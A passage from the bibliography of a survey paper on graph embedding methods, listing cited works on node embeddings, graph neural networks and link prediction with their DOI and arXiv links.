10.1016/j.websem.2017.06.002. Abu-El-Haija S, Perozzi B, Al-Rfou R. 2017. Learning edge representations via low-rank asymmetric projections. In: Proceedings of the 2017 ACM on Conference on Information and Knowledge Management. ACM, 1787–1796. Abu-El-Haija S, Perozzi B, Al-Rfou R, Alemi AA. 2018. Watch your step: learning node embeddings via graph attention. In: Advances in Neural Information Processing Systems. 9198–9208. Adafre SF, de Rijke M. 2005. Discovering missing links in wikipedia. In: Proceedings of the 3rd International Workshop on Link Discovery, LinkKDD ’05. New York: ACM, 90–97. Adamic LA, Adar E. 2003. Friends and neighbors on the web. Social networks 25(3):211–230 DOI 10.1016/S0378-8733(03)00009-1. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 40/62 http://dx.doi.org/10.7717/peerj-cs.357#supplemental-information http://dx.doi.org/10.7717/peerj-cs.357#supplemental-information http://dx.doi.org/10.7717/peerj-cs.357#supplemental-information http://dx.doi.org/10.1016/j.websem.2017.06.002 http://dx.doi.org/10.1016/S0378-8733(03)00009-1 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Ahmed A, Shervashidze N, Narayanamurthy S, Josifovski V, Smola AJ. 2013. Distributed large-scale natural graph factorization. In: Proceedings of the 22nd International Conference on World Wide Web. ACM, 37–48. Akyildiz TA, Aljundi AA, Kaya K. 2020. Gosh: Embedding big graphs on small hardware. In: 49th International Conference on Parallel Processing—ICPP, ICPP ’20. New York: Association for Computing Machinery. Alanis-Lobato G, Mier P, Andrade-Navarro MA. 2016. Efficient embedding of complex networks to hyperbolic space via their laplacian. Scientific Reports 6(1):30108 DOI 10.1038/srep30108. Alshahrani M, Khan MA, Maddouri O, Kinjo AR, Queralt-Rosinach N, Hoehndorf R. 2017. Neuro-symbolic representation learning on biological knowledge graphs. Bioinformatics 33(17):2723–2730 DOI 10.1093/bioinformatics/btx275. As Feder T, Motwani R. 1991. Clique partitions, graph compression, and speeding-up algorithms. In: Proceedings of the 23rd Annual ACM Symposium on the Theory of Computing. New York: ACM, 123–133. Atahan Akyildiz T, Alabsi Aljundi A, Kaya K. 2020. Understanding coarsening for embedding large-scale graphs. arXiv preprint arXiv:2009.04925. Atwood J, Towsley D. 2016. Diffusion-convolutional neural networks. In: Advances in Neural Information Processing Systems. 1993–2001. Azran A. 2007. The rendezvous algorithm: Multiclass semi-supervised learning with markov random walks. In: Proceedings of the 24th international conference on Machine learning. New York: ACM, 49–56. Backstrom L, Leskovec J. 2011. Supervised random walks: predicting and recommending links in social networks. In: Proceedings of the Fourth ACM International Conference on Web Search and Data Mining, WSDM ’11. New York: ACM, 635–644. Baldini L, Martino A, Rizzi A. 2020. Exploiting cliques for granular computing-based graph classification. In: 2020 International Joint Conference on Neural Networks (IJCNN). Piscataway: IEEE, 1–9. Baluja S, Seth R, Sivakumar D, Jing Y, Yagnik J, Kumar S, Ravichandran D, Aly M. 2008. Video suggestion and discovery for youtube: taking random walks through the view graph. In: Proceedings of the 17th International Conference on World Wide Web. New York: ACM, 895–904. Banerjee S, Khapra MM. 2019. Graph convolutional network with sequential attention for goal-oriented dialogue systems. Transactions of the Association for Computational Linguistics 7(1):485–500 DOI 10.1162/tacl_a_00284. Barabási A-L, Albert R. 1999. Emergence of scaling in random networks. Science 286(5439):509–512 DOI 10.1126/science.286.5439.509. Barrat A, Weigt M. 2000. On the properties of small-world network models. European Physical Journal B-Condensed Matter and Complex Systems 13(3):547–560 DOI 10.1007/s100510050067. Belkin M, Niyogi P. 2002. Laplacian eigenmaps and spectral techniques for embedding and clustering. In: Advances in NIPS. Cambridge: MIT press, 585–591. Berg Rv d, Kipf TN, Welling M. 2017. Graph convolutional matrix completion. arXiv preprint arXiv:1706.02263. Bhagat S, Cormode G, Muthukrishnan S. 2011. Node classification in social networks. In: Social Network Data Analytics. Berlin: Springer, 115–148. Bhagat S, Cormode G, Rozenbaum I. 2009. Applying link-based classification to label blogs. In: Advances in Web Mining and Web Usage Analysis. Berlin: Springer, 97–117. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 41/62 http://dx.doi.org/10.1038/srep30108 http://dx.doi.org/10.1093/bioinformatics/btx275 https://arxiv.org/abs/2009.04925 http://dx.doi.org/10.1162/tacl_a_00284 http://dx.doi.org/10.1126/science.286.5439.509 http://dx.doi.org/10.1007/s100510050067 https://arxiv.org/abs/1706.02263 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Bojcheski A, Günnemann S. 2018. Adversarial attacks on node embeddings. arXiv preprint arXiv:1809.01093. Bordes A, Glorot X, Weston J, Bengio Y. 2012. Joint learning of words and meaning representations for open-text semantic parsing. In: Artificial Intelligence and Statistics. Cambridge: PMLR, MIT Press, 127–135. Bordes A, Usunier N, Garcia-Duran A, Weston J, Yakhnenko O. 2013. Translating embeddings for modeling multi-relational data. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 2787–2795. Bordes A, Weston J, Collobert R, Bengio Y. 2011. Learning structured embeddings of knowledge bases. In: Twenty-Fifth AAAI Conference on Artificial Intelligence. AAAI, 25–27. Brand M. 2003. Continuous nonlinear dimensionality reduction by kernel eigenmaps. In: IJCAI. 547–554. Brochier R, Guille A, Velcin J. 2019. Global vectors for node representations. arXiv preprint arXiv:1902.11004. Bronstein MM, Bruna J, LeCun Y, Szlam A, Vandergheynst P. 2017. Geometric deep learning: going beyond euclidean data. IEEE Signal Processing Magazine 34(4):18–42 DOI 10.1109/MSP.2017.2693418. Bruna J, Zaremba W, Szlam A, LeCun Y. 2013. Spectral networks and locally connected networks on graphs. arXiv preprint arXiv:1312.6203. Cai H, Zheng VW, Chang KC-C. 2017. A comprehensive survey of graph embedding: problems, techniques and applications. arXiv preprint arXiv:1709.07604. Cao M, Ma X, Zhu K, Xu M, Wang C. 2020. Heterogeneous information network embedding with convolutional graph attention networks. In: 2020 International Joint Conference on Neural Networks (IJCNN). Piscataway: IEEE, 1–8. Cao S, Lu W, Xu Q. 2015. Grarep: learning graph representations with global structural information. In: Proceedings of the 24th ACM International on Conference on Information and Knowledge Management. New York: ACM, 891–900. Cao S, Lu W, Xu Q. 2016. Deep neural networks for learning graph representations. In: AAAI. 1145–1152. Cavallari S, Zheng VW, Cai H, Chang KC-C, Cambria E. 2017. Learning community embedding with community detection and node embedding on graphs. In: Proceedings of the 2017 ACM on Conference on Information and Knowledge Management. New York: ACM, 377–386. Çelikkanat A, Malliaros FD. 2019. Exponential family graph embeddings. arXiv preprint arXiv:1911.09007. Chamberlain BP, Clough J, Deisenroth MP. 2017. Neural embeddings of graphs in hyperbolic space. arXiv preprint arXiv:1705.10359. Chang J, Blei D. 2009. Relational topic models for document networks. In: Artificial Intelligence and Statistics. 81–88. Chang S, Han W, Tang J, Qi G-J, Aggarwal CC, Huang TS. 2015. Heterogeneous network embedding via deep architectures. In: Proceedings of the 21th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 119–128. Chen C, Min Z, Liu Y, Ma S. 2019a. Social attentional memory network: modeling aspect- and friend-level differences in recommendation. In: Proceedings of the Twelfth ACM International Conference on Web Search and Data Mining. New York: ACM, 177–185. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 42/62 https://arxiv.org/abs/1809.01093 https://arxiv.org/abs/1902.11004 http://dx.doi.org/10.1109/MSP.2017.2693418 https://arxiv.org/abs/1312.6203 https://arxiv.org/abs/1709.07604 https://arxiv.org/abs/1911.09007 https://arxiv.org/abs/1705.10359 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Chen C-M, Chien P-C, Lin Y-C, Tsai M-F, Yang Y-H. 2015a. Exploiting latent social listening representations for music recommendations. In: Proceedings of the Ninth ACM International Conference Recommender Systems Poster. 1–2. Chen C-M, Tsai M-F, Lin Y-C, Yang Y-H. 2016a. Query-based music recommendations via preference embedding. In: Proceedings of the 10th ACM Conference on Recommender Systems. New York: ACM, 79–82. Chen H, Anantharam AR, Skiena S. 2017. Deepbrowse: similarity-based browsing through large lists. In: International Conference on Similarity Search and Applications. Berlin: Springer, 300–314. Chen H, Koga H. 2019. Gl2vec: graph embedding enriched by line graphs with edge features. In: Gedeon T, Wong KW, Lee M, eds. Neural Information Processing. Cham: Springer International Publishing, 3–14. Chen H, Li X, Huang Z. 2005. Link prediction approach to collaborative filtering. In: Proceedings of the 5th ACM/IEEE-CS Joint Conference on Digital Libraries (JCDL ’05). New York: ACM, 141–142. Chen H, Perozzi B, Al-Rfou R, Skiena S. 2018a. A tutorial on network embeddings. arXiv preprint arXiv:1808.02590. Chen H, Perozzi B, Hu Y, Skiena S. 2018b. Harp: hierarchical representation learning for networks. In: Thirty-Second AAAI Conference on Artificial Intelligence. 2121–2134. Chen J, Ma T, Xiao C. 2018. Fastgcn: fast learning with graph convolutional networks via importance sampling. arXiv preprint arXiv:1801.10247. Chen J, Shi Z, Wu Y, Xu X, Zheng H. 2018c. Link prediction adversarial attack. arXiv preprint arXiv:1810.01110. Chen J, Wu Y, Lin X, Xuan Q. 2019b. Can adversarial network attack be defended? arXiv preprint arXiv:1903.05994. Chen J, Wu Y, Xu X, Chen Y, Zheng H, Xuan Q. 2018e. Fast gradient attack on network embedding. arXiv preprint arXiv:1809.02797. Chen J, Zhang A. 2020. Hgmf: heterogeneous graph-based fusion for multimodal data with incompleteness. In: Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining, KDD ’20. New York: Association for Computing Machinery, 1295–1305. Chen J, Zhang Q, Huang X. 2016b. Incorporate group information to enhance network embedding. In: Proceedings of the 25th ACM International on Conference on Information and Knowledge Management. New York: ACM, 1901–1904. Chen J, Zhu J, Song L. 2017. Stochastic training of graph convolutional networks with variance reduction. arXiv preprint arXiv:1710.10568. Chen M, Tsang IW, Tan M, Cham TJ. 2015b. A unified feature selection framework for graph embedding on high dimensional data. IEEE Transactions on Knowledge and Data Engineering 27(6):1465–1477 DOI 10.1109/TKDE.2014.2382599. Chen T, Sun Y. 2017. Task-guided and path-augmented heterogeneous network embedding for author identification. In: Proceedings of the Tenth ACM International Conference on Web Search and Data Mining. New York: ACM, 295–304. Chen Y, Rohrbach M, Yan Z, Shuicheng Y, Feng J, Kalantidis Y. 2019c. Graph-based global reasoning networks. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 43/62 https://arxiv.org/abs/1808.02590 https://arxiv.org/abs/1801.10247 https://arxiv.org/abs/1810.01110 https://arxiv.org/abs/1903.05994 https://arxiv.org/abs/1809.02797 https://arxiv.org/abs/1710.10568 http://dx.doi.org/10.1109/TKDE.2014.2382599 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Chen Y, Sun K, Pu J, Xiong Z, Zhang X. 2020. Grapasa: parametric graph embedding via siamese architecture. Information Sciences 512:1442–1457 DOI 10.1016/j.ins.2019.10.027. Cheng W, Zhang X, Guo Z, Wu Y, Sullivan PF, Wang W. 2013. Flexible and robust co-regularized multi-domain graph clustering. In: Proceedings of the 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 320–328. Chiang W-L, Liu X, Si S, Li Y, Bengio S, Hsieh C-J. 2019. Cluster-gcn: an efficient algorithm for training deep and large graph convolutional networks. In: Proceedings of the 25th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. 257–266. Cho H, Yu Y. 2018. Link prediction for interdisciplinary collaboration via co-authorship network. Social Network Analysis and Mining 8(1):25 DOI 10.1007/s13278-018-0501-6. Chung FR, Graham FC. 1997. Spectral graph theory. Vol. 92. Rhode Island: American Mathematical Soc. Clauset A, Moore C, Newman ME. 2008. Hierarchical structure and the prediction of missing links in networks. Nature 453(7191):98–101 DOI 10.1038/nature06830. Cobanoglu MC, Liu C, Hu F, Oltvai ZN, Bahar I. 2013. Predicting drug-target interactions using probabilistic matrix factorization. Journal of Chemical Information and Modeling 53(12):3399–3409 DOI 10.1021/ci400219z. Crichton G, Guo Y, Pyysalo S, Korhonen A. 2018. Neural networks for link prediction in realistic biomedical graphs: a multi-dimensional evaluation of graph embedding-based approaches. BMC Bioinformatics 19(1):176 DOI 10.1186/s12859-018-2163-9. Cui P, Wang X, Pei J, Zhu W. 2018. A survey on network embedding. IEEE Transactions on Knowledge and Data Engineering 31(5):833–852 DOI 10.1109/TKDE.2018.2849727. Dai H, Dai B, Song L. 2016. Discriminative embeddings of latent variable models for structured data. In: International conference on machine learning. New York: ACM, 2702–2711. Dai H, Li H, Tian T, Huang X, Wang L, Zhu J, Song L. 2018. Adversarial attack on graph structured data. arXiv preprint arXiv:1806.02371. De Oliveira MF, Levkowitz H. 2003. From visual data exploration to visual data mining: a survey. IEEE Transactions on Visualization and Computer Graphics 9(3):378–394 DOI 10.1109/TVCG.2003.1207445. Deerwester S, Dumais ST, Furnas GW, Landauer TK, Harshman R. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science 41(6):391–407 DOI 10.1002/(SICI)1097-4571(199009)41:6<391::AID-ASI1>3.0.CO;2-9. Defferrard M, Bresson X, Vandergheynst P. 2016. Convolutional neural networks on graphs with fast localized spectral filtering. In: Advances in Neural Information Processing Systems. 3844–3852. Devlin J, Chang M-W, Lee K, Toutanova K. 2018. Bert: pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805. Didimo W, Liotta G, Montecchiani F. 2019. A survey on graph drawing beyond planarity. ACM Computing Surveys 52(1):1–37 DOI 10.1145/3301281. Ding CH, He X, Zha H, Gu M, Simon HD. 2001. A min-max cut algorithm for graph partitioning and data clustering. In: Proceedings 2001 IEEE International Conference on Data Mining. Piscataway: IEEE, 107–114. Ding M, Tang J, Zhang J. 2018. Semi-supervised learning on graphs with generative adversarial nets. In: Proceedings of the 27th ACM International Conference on Information and Knowledge Management. New York: ACM, 913–922. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 44/62 http://dx.doi.org/10.1016/j.ins.2019.10.027 http://dx.doi.org/10.1007/s13278-018-0501-6 http://dx.doi.org/10.1038/nature06830 http://dx.doi.org/10.1021/ci400219z http://dx.doi.org/10.1186/s12859-018-2163-9 http://dx.doi.org/10.1109/TKDE.2018.2849727 https://arxiv.org/abs/1806.02371 http://dx.doi.org/10.1109/TVCG.2003.1207445 http://dx.doi.org/10.1002/(SICI)1097-4571(199009)41:6%3C391::AID-ASI1%3E3.0.CO;2-9 https://arxiv.org/abs/1810.04805 http://dx.doi.org/10.1145/3301281 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Do DT, Le TQT, Le NQK. 2020. Using deep neural networks and biological subwords to detect protein s-sulfenylation sites. Briefings in Bioinformatics 14:1049 DOI 10.1093/bib/bbaa128. Dong Y, Chawla NV, Swami A. 2017. Metapath2vec: scalable representation learning for heterogeneous networks. In: Proceedings of the 23rd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 135–144. Donnat C, Holmes S. 2018. Tracking network dynamics: a survey using graph distances. Annals of Applied Statistics 12(2):971–1012 DOI 10.1214/18-AOAS1176. Donnat C, Zitnik M, Hallac D, Leskovec J. 2018. Learning structural node embeddings via diffusion wavelets. Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining 24:1320–1329. Duvenaud DK, Maclaurin D, Iparraguirre J, Bombarell R, Hirzel T, Aspuru-Guzik A, Adams RP. 2015. Convolutional networks on graphs for learning molecular fingerprints. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 2224–2232. Efron B. 1992. Bootstrap methods: another look at the jackknife. In: Breakthroughs in Statistics. Berlin: Springer International Publishing, 569–593. Erdös P, Rényi A. 1959. On random graphs publ. Publicationes Mathematicae Debrecen 6:290–297. Ezzat A, Wu M, Li X-L, Kwoh C-K. 2017. Drug-target interaction prediction using ensemble learning and dimensionality reduction. Methods 129:81–88 DOI 10.1016/j.ymeth.2017.05.016. Ezzat A, Zhao P, Wu M, Li X-L, Kwoh C-K. 2016. Drug-target interaction prediction with graph regularized matrix factorization. IEEE/ACM Transactions On Computational Biology and Bioinformatics 14(3):646–656 DOI 10.1109/TCBB.2016.2530062. Fan M, Zhou Q, Chang E, Zheng TF. 2014. Transition-based knowledge graph embedding with relational mapping properties. Proceedings of the 28th Pacific Asia Conference on Language, Information and Computing 28:328–337. Fang H, Wu F, Zhao Z, Duan X, Zhuang Y, Ester M. 2016. Community-based question answering via heterogeneous social network learning. In: Thirtieth AAAI Conference on Artificial Intelligence. 122–128. Fathy A, Li K. 2020. Temporalgat: attention-based dynamic graph representation learning. In: Lauw HW, Wong RC-W, Ntoulas A, Lim E-P, Ng S-K, Pan SJ, eds. Advances in Knowledge Discovery and Data Mining. Cham: Springer International Publishing, 413–423. Feng R, Yang Y, Hu W, Wu F, Zhang Y. 2018. Representation learning for scale-free networks. In: Thirty-Second AAAI Conference on Artificial Intelligence. Fey M, Eric Lenssen J, Weichert F, Müller H. 2018. Splinecnn: fast geometric deep learning with continuous b-spline kernels. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 869–877. Fortunato S. 2010. Community detection in graphs. Physics Reports 486(3–5):75–174 DOI 10.1016/j.physrep.2009.11.002. Fu X, Zhang J, Meng Z, King I. 2020. Magnn: metapath aggregated graph neural network for heterogeneous graph embedding. In: Proceedings of the Web Conference 2020, WWW ’20. New York: Association for Computing Machinery, 2331–2341. Gallicchio C, Micheli A. 2020. Fast and deep graph neural networks. In: AAAI. 3898–3905. Ganguly S, Gupta M, Varma V, Pudi V. 2016. et al.Author2vec: learning author representations by combining content and link information. In: Proceedings of the 25th International Conference Companion on World Wide Web. 49–50. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 45/62 http://dx.doi.org/10.1093/bib/bbaa128 http://dx.doi.org/10.1214/18-AOAS1176 http://dx.doi.org/10.1016/j.ymeth.2017.05.016 http://dx.doi.org/10.1109/TCBB.2016.2530062 http://dx.doi.org/10.1016/j.physrep.2009.11.002 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Gao F, Musial K, Cooper C, Tsoka S. 2015. Link prediction methods and their accuracy for different social networks and network metrics. Scientific Programming 2015(3):1–13 DOI 10.1155/2015/172879. Gao J, Zhang T, Xu C. 2019. Graph convolutional tracking. In: CVPR. Gao S, Denoyer L, Gallinari P. 2011. Temporal link prediction by integrating content and structure information. In: Proceedings of the 20th ACM International Conference on Information and Knowledge Management, CIKM ’11. New York: ACM, 1169–1174. Geng X, Zhang H, Bian J, Chua T-S. 2015. Learning image and user features for recommendation in social networks. In: Proceedings of the IEEE International Conference on Computer Vision. Piscataway: IEEE, 4274–4282. Getoor L, Taskar B. 2007. Statistical relational learning. https://mitpress.mit.edu/books/ introduction-statistical-relational-learning. Gilmer J, Schoenholz SS, Riley PF, Vinyals O, Dahl GE. 2017. Neural message passing for quantum chemistry. In: Proceedings of the 34th International Conference on Machine Learning-Volume 70. 1263–1272. Golub GH, Reinsch C. 1971. Singular value decomposition and least squares solutions. In: Linear Algebra. Berlin: Springer, 134–151. Goyal P, Chhetri SR, Canedo A. 2020. Dyngraph2vec: capturing network dynamics using dynamic graph representation learning. Knowledge-Based Systems 187:104816 DOI 10.1016/j.knosys.2019.06.024. Goyal P, Ferrara E. 2017. Graph embedding techniques, applications, and performance: a survey. arXiv preprint arXiv:1705.02801. Goyal P, Hosseinmardi H, Ferrara E, Galstyan A. 2018. Embedding networks with edge attributes. In: Proceedings of the 29th on Hypertext and Social Media. New York: ACM, 38–42. Grover A, Leskovec J. 2016. Node2vec: scalable feature learning for networks. Proceedings of the 22nd ACM SIGKDD IC on KDD 22:855–864. Gui H, Liu J, Tao F, Jiang M, Norick B, Han J. 2016. Large-scale embedding learning in heterogeneous event data. In: 2016 IEEE 16th International Conference on Data Mining (ICDM). Piscataway: IEEE, 907–912. Guo Z, Zhang Y, Lu W. 2019. Attention guided graph convolutional networks for relation extraction. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. Florence: Association for Computational Linguistics, 241–251. Haddad M, Bothorel C, Lenca P, Bedart D. 2019. Temporalnode2vec: temporal node embedding in temporal networks. In: International Conference on Complex Networks and Their Applications. Berlin: Springer International Publishing, 891–902. Hamilton W, Ying Z, Leskovec J. 2017a. Inductive representation learning on large graphs. In: Advances in NIPS. Cambridge: MIT press, 1025–1035. Hamilton WL, Ying R, Leskovec J. 2017b. Representation learning on graphs: methods and applications. arXiv preprint arXiv:1709.05584. Hasan MA, Zaki MJ. 2011. A survey of link prediction in social networks, chapter 9. Boston: Springer US, 243–275. Hayashi K, Ohsaki M. 2020. Reinforcement learning and graph embedding for binary truss topology optimization under stress and displacement constraints. Frontiers in Built Environment 6:59 DOI 10.3389/fbuil.2020.00059. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 46/62 http://dx.doi.org/10.1155/2015/172879 https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning http://dx.doi.org/10.1016/j.knosys.2019.06.024 https://arxiv.org/abs/1705.02801 https://arxiv.org/abs/1709.05584 http://dx.doi.org/10.3389/fbuil.2020.00059 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ He Q, Pei J, Kifer D, Mitra P, Giles L. 2010. Context-aware citation recommendation. In: Proceedings of the 19th International Conference on World Wide Web, WWW ’10. New York: ACM, 421–430. He S, Liu K, Ji G, Zhao J. 2015. Learning to represent knowledge graphs with gaussian embedding. Proceedings of the 24th ACM International on Conference on Information and Knowledge Management 24:623–632. He X, Niyogi P. 2004. Locality preserving projections. In: Advances in Neural Information Processing Systems. 153–160. Heckerman D, Meek C, Koller D. 2007. Probabilistic entity-relationship models, prms, and plate models. In: Introduction to Statistical Relational Learning. 201–238. Henaff M, Bruna J, LeCun Y. 2015. Deep convolutional networks on graph-structured data. arXiv preprint arXiv:1506.05163. Herman I, Melançon G, Marshall MS. 2000. Graph visualization and navigation in information visualization: a survey. IEEE Transactions on Visualization and Computer Graphics 6(1):24–43 DOI 10.1109/2945.841119. Hettige B, Wang W, Li Y-F, Buntine W. 2020. Robust attribute and structure preserving graph embedding. In: Pacific-Asia Conference on Knowledge Discovery and Data Mining. Berlin: Springer, 593–606. Hong H, Lin Y, Yang X, Li Z, Fu K, Wang Z, Qie X, Ye J. 2020. Heteta: heterogeneous information network embedding for estimating time of arrival. In: Proceedings of the 26th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining, KDD ’20. New York: Association for Computing Machinery, 2444–2454. Hou C, Nie F, Tao H, Yi D. 2017. Multi-view unsupervised feature selection with adaptive similarity and view weight. IEEE Transactions on Knowledge and Data Engineering 29(9):1998–2011 DOI 10.1109/TKDE.2017.2681670. Hu B, Fang Y, Shi C. 2019. Adversarial learning on heterogeneous information networks. In: Proceedings of the 25th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining, KDD ‘19. New York: Association for Computing Machinery, 120–129. Huang X, Li J, Hu X. 2017. Label informed attributed network embedding. In: Proceedings of the Tenth ACM International Conference on Web Search and Data Mining. New York: ACM, 731–739. Huang X, Zhang J, Li D, Li P. 2019. Knowledge graph embedding based question answering. In: Proceedings of the Twelfth ACM International Conference on Web Search and Data Mining. New York: ACM. Vol. 12. 105–113. Huang Z, Mamoulis N. 2017. Heterogeneous information network embedding for meta path based proximity. arXiv preprint arXiv:1701.05291. Islam MR, Prakash BA, Ramakrishnan N. 2018. Signet: Scalable embeddings for signed networks. In: Pacific-Asia Conference on Knowledge Discovery and Data Mining. Berlin: Springer International Publishing, 157–169. Jacob Y, Denoyer L, Gallinari P. 2014. Learning latent representations of nodes for classifying in heterogeneous social networks. In: Proceedings of the 7th ACM International Conference on Web Search and Data Mining. New York: ACM, 373–382. Jenatton R, Roux NL, Bordes A, Obozinski GR. 2012. A latent factor model for highly multi-relational data. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 3167–3175. Ji G, He S, Xu L, Liu K, Zhao J. 2015. Knowledge graph embedding via dynamic mapping matrix. In: Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 47/62 https://arxiv.org/abs/1506.05163 http://dx.doi.org/10.1109/2945.841119 http://dx.doi.org/10.1109/TKDE.2017.2681670 https://arxiv.org/abs/1701.05291 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), volume 53. 687–696. Ji G, Liu K, He S, Zhao J. 2016. Knowledge graph completion with adaptive sparse transfer matrix. In: Thirtieth AAAI Conference on Artificial Intelligence. New York: AAAI, 30. Jiang Z, Gao Z, Lan J, Yang H, Lu Y, Liu X. 2020. Task-oriented genetic activation for large-scale complex heterogeneous graph embedding. In: Proceedings of the Web Conference 2020, WWW ’20. New York: Association for Computing Machinery, 1581–1591. Jing Y, Wang H, Shao K, Huo X, Zhang Y. 2020. Unsupervised graph representation learning with variable heat kernel. IEEE Access 8:15800–15811 DOI 10.1109/ACCESS.2020.2966409. Johansson FD, Dubhashi D. 2015. Learning with similarity functions on graphs using matchings of geometric embeddings. In: Proceedings of the 21th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 467–476. Kearnes S, McCloskey K, Berndl M, Pande V, Riley P. 2016. Molecular graph convolutions: moving beyond fingerprints. Journal of Computer-Aided Molecular Design 30(8):595–608 DOI 10.1007/s10822-016-9938-8. Kefato ZT, Sheikh N, Montresor A. 2020. Which way? direction-aware attributed graph embedding. arXiv preprint arXiv:2001.11297. Keser R, Nallbani I, Calik N, Ayanzadeh A, Töreyin B. 2020. Graph embedding for link prediction using residual variational graph autoencoders. In: The 28th IEEE Conference on Signal Processing and Communications Applications. Piscataway: IEEE. Khalil E, Dai H, Zhang Y, Dilkina B, Song L. 2017. Learning combinatorial optimization algorithms over graphs. In: Advances in Neural Information Processing Systems. 6348–6358. Khasahmadi AH, Hassani K, Moradi P, Lee L, Morris Q. 2020. Memory-based graph networks. In: International Conference on Learning Representations.. Kim D, Kim S, Kwak N. 2018. Textbook question answering with knowledge graph understanding and unsupervised open-set text comprehension. arXiv preprint arXiv:1811.00232. Kim J, Kim T, Kim S, Yoo CD. 2019. Edge-labeling graph neural network for few-shot learning. arXiv preprint arXiv:1905.01436. Kim J, Park H, Lee J-E, Kang U. 2018. Side: Representation learning in signed directed networks. In: Proceedings of the 2018 World Wide Web Conference, WWW ’18. Republic and Canton of Geneva, CHE: International World Wide Web Conferences Steering Committee, 509–518. Kingma DP, Welling M. 2013. Auto-encoding variational bayes. arXiv preprint arXiv:1312.6114. Kipf TN, Welling M. 2016a. Semi-supervised classification with graph convolutional networks. arXiv preprint arXiv:1609.02907. Kipf TN, Welling M. 2016b. Variational graph auto-encoders. arXiv preprint arXiv:1611.07308. Kleinberg R. 2007. Geographic routing using hyperbolic space. In: IEEE Infocom 2007-26th IEEE International Conference On Computer Communications. Piscataway: IEEE, 1902–1909. Kolouri S, Naderializadeh N, Rohde GK, Hoffmann H. 2020. Wasserstein embedding for graph learning. arXiv preprint arXiv:2006.09430. Kong X, Mao M, Wang W, Liu J, Xu B. 2018. Voprec: vector representation learning of papers with text information and structural identity for recommendation. In: IEEE Transactions on Emerging Topics in Computing.. Krioukov D, Papadopoulos F, Boguñá M, Vahdat A. 2009. Greedy forwarding in scale-free networks embedded in hyperbolic metric spaces. ACM SIGMETRICS Performance Evaluation Review 37(2):15–17 DOI 10.1145/1639562.1639568. Kruskal J, Wish M. 1978. Multidimensional Scaling. New York: SAGE Publications. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 48/62 http://dx.doi.org/10.1109/ACCESS.2020.2966409 http://dx.doi.org/10.1007/s10822-016-9938-8 https://arxiv.org/abs/2001.11297 https://arxiv.org/abs/1811.00232 https://arxiv.org/abs/1905.01436 https://arxiv.org/abs/1312.6114 https://arxiv.org/abs/1609.02907 https://arxiv.org/abs/1611.07308 https://arxiv.org/abs/2006.09430 http://dx.doi.org/10.1145/1639562.1639568 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Kulmanov M, Khan MA, Hoehndorf R. 2018. Deepgo: predicting protein functions from sequence and interactions using a deep ontology-aware classifier. Bioinformatics 34(4):660–668 DOI 10.1093/bioinformatics/btx624. Laakom F, Raitoharju J, Passalis N, Iosifidis A, Gabbouj M. 2020. Graph embedding with data uncertainty. arXiv preprint arXiv:2009.00505. Le NQK, Yapp EKY, Yeh H-Y. 2019. Et-gru: using multi-layer gated recurrent units to identify electron transport proteins. BMC Bioinformatics 20(1):377 DOI 10.1186/s12859-019-2972-5. Le TM, Lauw HW. 2014. Probabilistic latent document network embedding. In: 2014 IEEE International Conference on Data Mining (ICDM). Piscataway: IEEE, 270–279. Lee JB, Rossi R, Kong X. 2018. Graph classification using structural attention. In: Proceedings of the 24th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining. New York: ACM, 1666–1674. Lee JB, Rossi RA, Kim S, Ahmed NK, Koh E. 2019. Attention models in graphs: a survey. ACM Transactions on Knowledge Discovery from Data 13(6):1–25 DOI 10.1145/3363574. Lei M, Shi Y, Niu L. 2018. The applications of stochastic models in network embedding: a survey. In: 2018 IEEE/WIC/ACM International Conference on Web Intelligence (WI). Piscataway: IEEE, 635–638. Leskovec J, Huttenlocher D, Kleinberg J. 2010. Signed networks in social media. In: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, CHI ’10. New York: 